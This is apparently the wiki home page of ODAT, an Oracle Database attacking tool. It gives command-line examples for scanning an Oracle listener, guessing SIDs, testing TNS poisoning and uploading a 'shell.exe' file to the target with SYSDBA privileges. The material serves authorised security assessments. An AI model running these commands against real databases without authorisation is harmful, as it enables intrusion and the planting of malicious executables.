Skip to content
Stuart Walker edited this page Sep 8, 2024 · 15 revisions

This wiki explains how to use ODAT (Oracle Database Attacking Tool) during security assessments.

Explanations and examples are organized by ODAT module in this Wiki (see on the right).

The -h option can be used to get the ODAT help menu:

./odat.py -h

The all module is the first module that should be used when you meet an Oracle Database. For example, you can use this command for starting:

./odat.py all -s 192.168.1.254 -p 1521

You can give the SID if you know it:

./odat.py all -s 192.168.1.254 -p 1521 -d ORCL

If you know a valid account, you can give it to this module:

./odat.py all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password

See all for more details about this module.

For each module (i.e. sidguesser), you can use -v, -vv or -vvv for enabling verbosity and understanding how or what the module is doing. For example:

./odat.py all -s 192.168.1.254 -vvv

Before to use a specific command of a module, the --test-module should be used first for knowing if you can use it (target is vulnerable, Oracle account has enough privileges, etc). For example:

./odat.py tnspoison -s 192.168.1.254 -p 1521 -d ORCL --test-module

The --sysdba flag can be used to perform an action using DBA privileges, if your user account has them.

./odat.py utlfile -s 192.168.1.254 -p 1521 -d XE -U scott -P tiger --sysdba --putFile 'C:/windows/temp/' shell.exe shell.exe

This can be useful if you get the error 'ORA-01031: insufficient privileges' when your user should be able to perform an action

Clone this wiki locally